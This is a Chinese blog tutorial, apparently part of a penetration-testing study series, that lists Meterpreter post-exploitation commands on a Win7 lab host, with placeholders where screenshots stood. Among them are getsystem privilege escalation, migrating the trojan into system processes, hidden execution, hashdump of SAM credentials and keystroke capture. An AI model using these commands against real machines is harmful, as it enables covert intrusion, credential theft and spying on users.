内网渗透 day4-meterpreter基本命令

meterpreter基本命令

目录

1.getuid 查看当前用户 1

2.getpid 查看当前的进程id 1

3.getsystem 初步提权 1

4.ps 1.查看进程列表2.帮助我们获取pid进行进程迁移 1

5.migrate 7624 会话迁移 将木马进程注入系统进程中 2

6.shell 进入cmd环境(碰到乱码:chcp 65001 (utf-8)) 2

7.execute 执行命令(常用execute -H -c -i -f cmd) 2

8.bg 返回控制台 3

9.sessions 查看会话 3

10.sessions -i id 进入会话 3

11.sessions -k id | sessions -K  指定删除会话|删除全部会话 4

12.jobs 查看工作 4

13.run -j | exploit -j 后台监听 4

14.run -z | exploit -z 持续监听 5

15.hashdump 下载sam表中的账户密码信息(需要管理员权限) 5

16.捕获键盘按击 5

18.run vnc | screenshare   实时查看对方电脑屏幕 6

19.pwd 当前目录位置 6

20.download 从远程主机中下载文件 6

21.upload 从远程主机中上传文件 7

1.getuid 查看当前用户

wps43

2.getpid 查看当前的进程id

wps44

3.getsystem 初步提权

wps45

注意:这边是在win7使用管理员身份运行木马了,不然一般是不成功的。

4.ps 1.查看进程列表2.帮助我们获取pid进行进程迁移

wps46

5.migrate 7624 迁移  将木马进程注入系统进程中

wps47

这时候在输入ps查看就找不到4092进程了

6.shell 进入cmd环境(碰到乱码:chcp 65001 (utf-8))

wps48

7.execute 执行命令(常用execute -H -c -i -f cmd)

wps49

-H创建隐藏的进程

-c 信道化I/O(交互所需)

-i 创建流程后与之交互

-f 要运行的可执行命令

8.bg 返回控制台

wps50

9.sessions 查看会话

wps51

10.sessions -i id 进入会话

wps52

11.sessions -k id | sessions -K  指定删除会话|删除全部会话

wps53

wps54

12.jobs 查看工作

wps55

13.run -j | exploit -j 后台监听

wps56

win7点击木马文件后会话才会产生

wps57

14.run -z | exploit -z 持续监听

wps58

wps59

15.hashdump 下载sam表中的账户密码信息(需要管理员权限)

wps60

16.捕获键盘按击

keyscan_dump   Dump the keystroke buffer

keyscan_start  Start capturing keystrokes

keyscan_stop   Stop capturing keystrokes

wps61

17screenshot 截屏

wps62

wps63

18.run vnc | screenshare   实时查看对方电脑屏幕

wps64wps65

19.pwd 当前目录位置

wps66

20.download 从远程主机中下载文件

wps67wps68wps69

21.upload 从远程主机中上传文件

wps70

wps71wps72

posted @ 2020-11-11 10:55  彩虹猛犸  阅读(389)  评论(0编辑  收藏  举报